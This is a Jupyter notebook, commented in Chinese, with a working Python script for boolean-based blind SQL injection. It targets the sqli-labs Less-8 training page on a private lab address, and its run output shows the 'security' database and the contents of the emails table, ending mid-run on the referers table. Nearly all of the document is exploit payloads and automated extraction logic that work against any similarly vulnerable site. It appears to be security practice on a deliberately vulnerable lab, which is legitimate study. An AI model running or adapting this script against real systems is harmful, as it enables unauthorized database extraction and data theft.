In [1]:
import requests

In [2]:
global url
global chars

In [3]:
url = "http://192.168.56.141/sqli/Less-8/?id="
chars = "abcdefghijklmnopqrstuvwxyz_@!.,?-#1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# chars = "s1e4cmoukrity"

In [4]:
# 拿到页面元素，判断返回结果是否存在成功信息，返回布尔
def sendPayload(payload):
    rText = requests.get(url + payload)
    rText.encoding = 'utf-8'
    if "You are in..........." in rText.text:
        return True
    return False

In [5]:
# 猜测数据库名称长度
def getDatabaseNameLength():
    print("===开始猜测数据库名长度===")
    length = 0
    while True:
        # print("猜测长度:", length)
        # payload = f" 1' AND (SELECT LENGTH(database()) = {length} ) --+ "
        # payload = " 1' AND (SELECT LENGTH(database()) = {}) --+ ".format(length)
        payload = " 'OR (SELECT LENGTH(database()) = {}) --+ ".format(length)
        if sendPayload(payload):
            # print("数据库名长度为：", length)
            print("done")
            return length
        length += 1
        if length > 50:
            length = 0
            print("猜测数据库名长度超过50，程序结束")
            return length;

In [6]:
# 猜测数据库名
def getDatabaseName(databaseNamelength):
    print("===开始猜测数据库名===")
    databaseName = ""
    for i in range(1, databaseNamelength + 1):
        for char in chars:
            # print("碰撞字符：", char)
            payload = f" ' OR ({ord(char)} = (SELECT ASCII(SUBSTR(database(), {i}, 1)))) --+"
            if sendPayload(payload):
                databaseName = databaseName + char
                # print("第", i,"位碰撞结果为：", char)
                break
            if char == chars[-1]:
                print("数据库名碰撞失败，字符集中没有数据库名对应的字符！");
                databaseName = ""
                return databaseName
    # print("数据库名为：", databaseName)  
    print("done")
    return databaseName;

In [7]:
# 猜测表数量
def getTableNum(databaseName):
    print("===开始猜测表数量===")
    tableNum = 0
    while True:
        # print("猜测数量：", tableNum)
        payload = f" ' OR ({tableNum} = (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema = '{databaseName}')) --+"
        if sendPayload(payload):
            # print("表的数量为：", tableNum)
            print("done")
            return tableNum
        tableNum += 1
        if tableNum > 500:
            tableNum = 0
            print("猜测表数量超过500，程序停止")
            print("done")
            return length;

In [8]:
# 猜测每个表的表长度
def getTableNameLength(databaseName, tableNum):
    print("===开始猜测每个表长度===")
    tableNameLengthList = []
    for i in range(0, tableNum):
        # print("对第", i, "个表的长度进行猜测：")
        tableNameLength = 0
        while True:
            payload = f" ' OR ({tableNameLength} = LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema = '{databaseName}' LIMIT {i}, 1))) --+"
            if sendPayload(payload):
                # print(f"第{i+1}个表的长度为：", tableNameLength)
                tableNameLengthList.append(tableNameLength)
                break
            tableNameLength += 1
            if tableNameLength > 300:
                tableNameLength = 0
                # print(f"第{i+1}个表的长度超过300，停止继续计算。")
                break
    # print(databaseName, "数据库下", tableNum, "张表的长度分别为：", tableNameLengthList)
    print("done")
    return tableNameLengthList

In [9]:
# 猜测每个表的表名
def getTableNameList(databaseName, tableNum, tableNameLengthList):
    print("===开始猜测每个表的表名===")
    tableNameList = []
    for i in range(0, tableNum):
        # print("开始碰撞第",i+1,"个表")
        tableName = ""
        for j in range(1, tableNameLengthList[i] + 1):
            for char in chars:
                payload = f" ' OR ({ord(char)} = (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{databaseName}' LIMIT {i}, 1), {j}, 1))) ) --+"
                if sendPayload(payload):
                    tableName += char
                    # print(i, "表第", j,"位碰撞结果为：", char)
                    break
                if char == chars[-1]:
                    print("第", i+1,"个表名碰撞失败，字符集中没有表名对应的字符！");
                    databaseName = ""
                    return databaseName
        tableNameList.append(tableName)
        # print("第", i+1, "个表名为：", tableName)
    # print(databaseName, "数据库中表分别为：", tableNameList)   
    print("done")
    return tableNameList

In [10]:
# 猜测每个表的表的字段数量（但是最终拿到表内的值）
def getColumnNum(databaseName, tableNameList):
    dataValueListListList = []
    print("===开始猜测每个表的字段数===")
    columnNumList = []
    for tableName in tableNameList:
        columnNum = 0
        while True:
            # print("猜测",tableName,"表字段数量为：", columnNum)
            payload = f" ' OR ({columnNum} = (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name = '{tableName}' AND table_schema = '{databaseName}' )) --+"
            if sendPayload(payload):
                # print(f"{tableName}表的字段数为：", columnNum)
                columnNumList.append(columnNum)
                break
            columnNum += 1
            if columnNum > 300:
                columnNum = 0
                print(f"{tableName}表的字段数量超过300，停止猜测。")
                break       
        # 拿到字段数量直接开始获取每个字段的字段长度
        columnLengthList = getColumnLengthList(databaseName, tableName, columnNum)
        # 拿到字段数量直接开始获取每个字段的字段值
        columnNameList = getColumnNameList(databaseName, tableName, columnNum, columnLengthList)
        print(columnNameList)
        # 拿到字段值后可以对每个表中对应字段下的数据个数进行猜测
        dataNum = getDataNumList(tableName, columnNameList, columnNum, databaseName)
        # 拿到对应字段下的数据长度后可以对每个字段下每条数据的长度进行猜测
        dataValueListList = getDataLengthListList(dataNum, columnNameList, tableName, databaseName, columnNum)
        dataValueListListList.append(dataValueListList)
        printTable(columnNameList, dataValueListList, tableName)
        
    print("done") 
    # print("每个表的字段数量为：", columnNumList)       
    return dataValueListListList

In [11]:
# 猜测某个表第x个字段的字段长度
def getColumnLengthList(databaseName, tableName, columnNum):
    print("===（子）开始猜测", tableName,"表", columnNum,"个字段的长度===")
    columnLengthList = []
    for i in range(0, columnNum):
        columnLength = 0
        while True:
            payload = f" ' OR ( {columnLength} = (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_name = '{tableName}' AND table_schema = '{databaseName}' LIMIT {i}, 1 ) ) --+"
            if sendPayload(payload):
                # print(tableName,"表的第", i+1, "个字段长度为：", columnLength)
                columnLengthList.append(columnLength)
                break
            columnLength += 1
            if columnLength > 500:
                print(tableName,"表的第", i+1, "个字段长度大于500，不再进行猜测")
                break
    # print(tableName,"表共", columnNum, "个字段，长度分别为：", columnLengthList)
    print("done")
    return columnLengthList
    

In [12]:
# 猜测某个表每个字段的字段名
def getColumnNameList(databaseName, tableName, columnNum, columnLengthList):
    print("===（子）开始猜测", tableName,"表", columnNum,"个字段名===")
    columnNameList = []
    for i in range(0, columnNum):
        columnName = ""
        for j in range(1, columnLengthList[i] + 1):
            for char in chars:
                payload = f" ' OR ({ord(char)} = ( ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name = '{tableName}' AND table_schema = '{databaseName}'  LIMIT {i}, 1 ), {j}, 1))  )) --+"
                if sendPayload(payload):
                    columnName += char
                    break
        columnNameList.append(columnName)
        # print(tableName,"表的第",i+1,"个字段名是：", columnName)
    print("done")
    return columnNameList
    

In [13]:
# 猜测每个表中对应字段下的数据个数
def getDataNumList(tableName, columnNameList, columnNum, databaseName):
    print("===（子）开始猜测", tableName,"表对应字段下的数据个数===")
    dataNumList = []
    for i in range(0, columnNum):
    # for columnName in columnNameList:
        dataNum = 0
        while True:
            payload = f" ' OR ({dataNum} = (SELECT COUNT({columnNameList[i]}) FROM {databaseName}.{tableName} ) ) --+"
            # payload = f" ' OR ({dataNum} = (SELECT COUNT({columnName}) FROM {databaseName}.{tableName})) --+"
            if sendPayload(payload):
                # print(tableName ,"表第", i+1, "列的", columnNameList[i], "字段中数据个数为：", dataNum)
                # print(tableName ,"表中", columnName, "字段中数据个数为：", dataNum)
                dataNumList.append(dataNum)
                break
            dataNum += 1
            if dataNum > 20000:
                print(tableName ,"表第", i+1, "列的", columnNameList[i], "字段中数据个数超过20000，不再猜测")
                # print(tableName ,"表中", columnName, "字段中数据个数超过20000，不再猜测")
                dataNum = 0
                break
    # print(tableName ,"表第每列字段中数据个数分别为：", dataNumList)
    # print(tableName ,"表第每列字段中数据个数为：", dataNum)
    print("done")
    return dataNum


In [14]:
# 猜测每个表中对应字段下每条数据的长度
def getDataLengthListList(dataNum, columnNameList, tableName, databaseName, columnNum):
    dataValueListList = []
    print("===（子）开始猜测", tableName,"表对应字段下每条数据的长度===")
    dataLengthListList = []
    for columnName in columnNameList:
        dataLengthList = []
        for i in range(0, dataNum):
            dataLength = 0
            while True:
                payload = f" ' OR ( {dataLength} = (SELECT LENGTH({columnName}) FROM {databaseName}.{tableName} LIMIT {i}, 1) ) --+ "
                if sendPayload(payload):
                    # print(tableName, "表中", columnName, "列第", i+1, "行数据长度为：", dataLength)
                    dataLengthList.append(dataLength)
                    break
                dataLength += 1
                if dataLength > 100:
                    print(tableName, "表中", columnName, "列第", i+1, "行数据长度超过10000，停止猜测")
                    break
        # print(tableName, "表中", columnName, "列每行数据长度分别为：", dataLengthList)
        dataLengthListList.append(dataLengthList)
        # 此时拿到的dataLengthList是tableName表下某一列的全部数据的数据长度，据此开始猜测数据内容
        dataValueList = getdataValueList(databaseName, tableName, columnName, dataLengthList)
        dataValueListList.append(dataValueList)
    # print(tableName, "表中每列每行数据长度分别为：", dataLengthListList)
    return dataValueListList
    

In [15]:
# 猜测每个表中对应字段下每条数据的值
def getdataValueList(databaseName, tableName, columnName, dataLengthList):
    print("===（子子）开始猜测", tableName,"表对应字段下每条数据的值===")
    dataValueList = []
    for i in range(0, len(dataLengthList)):
        dataValue = ""
        for j in range(0, dataLengthList[i]):
            for char in chars:
                # print(char, columnName, databaseName, tableName, i+1, j+1)
                # payload = f" ' OR ( {ord(char)} = (ASCII(SUBSTR(CAST((SELECT {columnName} FROM {databaseName}.{tableName}             LIMIT {i}, 1) AS CHAR), {j+1}, 1 )))  ) --+"
                payload = f" ' OR ( {ord(char)} = (ASCII(SUBSTR(CAST((SELECT {columnName} FROM {databaseName}.{tableName} ORDER BY id LIMIT {i}, 1) AS CHAR), {j+1}, 1 )))  )--+"
                if sendPayload(payload):
                    dataValue += char
                    break
                if char == chars[-1]:
                    print(tableName, "表", columnName,"列中第", i+1,"个值碰撞失败，字符集中没有该值对应的字符！")
                    dataValue = ""
                    break
        dataValueList.append(dataValue)
    # print(tableName, "表", columnName,"列值为：", dataValueList)
    print("done")
    return dataValueList

In [16]:
def printTable(columnNameList, dataValueListList, tableName):
    # print(columnNameList)
    # print(dataValueListList)
    print("表：", tableName)
    # 处理列名和数据列的最小长度，防止超出索引
    min_len = min(len(columnNameList), len(dataValueListList))
    
    # 使用有效的字段名和数据列
    columnNameList = columnNameList[:min_len]
    dataValueListList = dataValueListList[:min_len]
    
    # 如果某些列为空，则填充这些列的值为适当数量的空字符串
    row_count = max(len(col) for col in dataValueListList) if dataValueListList else 0
    for i in range(len(dataValueListList)):
        if len(dataValueListList[i]) < row_count:
            dataValueListList[i].extend([''] * (row_count - len(dataValueListList[i])))
    
    # 转置数据以从列格式转换为行格式
    transposed_data = list(zip(*dataValueListList)) if row_count > 0 else []
    
    # 计算每列的最大宽度
    column_widths = [max(len(str(col)), max(len(str(item)) for item in col_values)) 
                     for col, col_values in zip(columnNameList, zip(*dataValueListList))] if row_count > 0 else [len(col) for col in columnNameList]
    
    # 打印表头
    header = " | ".join(f"{col:<{column_widths[i]}}" for i, col in enumerate(columnNameList))
    print(header)
    print("-" * len(header))
    
    # 打印表内容
    if transposed_data:
        for row in transposed_data:
            row_str = " | ".join(f"{str(item):<{column_widths[i]}}" for i, item in enumerate(row))
            print(row_str)
    else:
        print("(no data)")  # 当所有列都为空时显示无数据


In [17]:
# 最终执行完美输出
def printDatabaseInfo():
    databaseNameLength = getDatabaseNameLength()
    databaseName = getDatabaseName(databaseNameLength)
    print("数据库名为：",databaseName,"，长度为：",databaseNameLength)
    tableNum = getTableNum(databaseName)
    tableNameLengthList = getTableNameLength(databaseName, tableNum)
    tableNameList = getTableNameList(databaseName, tableNum, tableNameLengthList)
    # print(databaseName, "数据库中共有", tableNum, "张表，分别为:", for tableName in tableNameList: print(tableName, "\n"))
    print(databaseName, "数据库中共有", tableNum, "张表，分别为:", tableNameList)
    dataValueListListList = getColumnNum(databaseName, tableNameList)
    # print(dataValueListListList)


In [ ]:
if __name__ == '__main__':
    # databaseNameLength = getDatabaseNameLength()
    # databaseNameLength = 8
    # databaseName = getDatabaseName(databaseNameLength)
    # databaseName = 'security'
    # tableNum = getTableNum(databaseName)
    # tableNum = 4
    # tableNameLengthList = getTableNameLength(databaseName, tableNum)
    # tableNameLengthList = [6, 8, 7, 5]
    # tableNameList = getTableNameList(databaseName, tableNum, tableNameLengthList)
    # tableNameList = ['emails', 'referers', 'uagents', 'users']
    # columnNumList = getColumnNum(databaseName, tableNameList)
    printDatabaseInfo()
    
    
    

===开始猜测数据库名长度===
done
===开始猜测数据库名===
done
数据库名为： security ，长度为： 8
===开始猜测表数量===
done
===开始猜测每个表长度===
done
===开始猜测每个表的表名===
done
security 数据库中共有 4 张表，分别为: ['emails', 'referers', 'uagents', 'users']
===开始猜测每个表的字段数===
===（子）开始猜测 emails 表 2 个字段的长度===
done
===（子）开始猜测 emails 表 2 个字段名===
done
['id', 'email_id']
===（子）开始猜测 emails 表对应字段下的数据个数===
done
===（子）开始猜测 emails 表对应字段下每条数据的长度===
===（子子）开始猜测 emails 表对应字段下每条数据的值===
done
===（子子）开始猜测 emails 表对应字段下每条数据的值===
done
表： emails
id               | email_id        
-----------------------------------
1                | Dumb@dhakkan.com
2                | Angel@iloveu.com
3                | Dummy@dhakkan.local
4                | secure@dhakkan.local
5                | stupid@dhakkan.local
6                | superman@dhakkan.local
7                | batman@dhakkan.local
8                | admin@dhakkan.com
===（子）开始猜测 referers 表 3 个字段的长度===
done
===（子）开始猜测 referers 表 3 个字段名===
done
['id', 'referer', 'ip_address']
===（子）开始猜测 referers 表对应字段下的数据个数===
done
=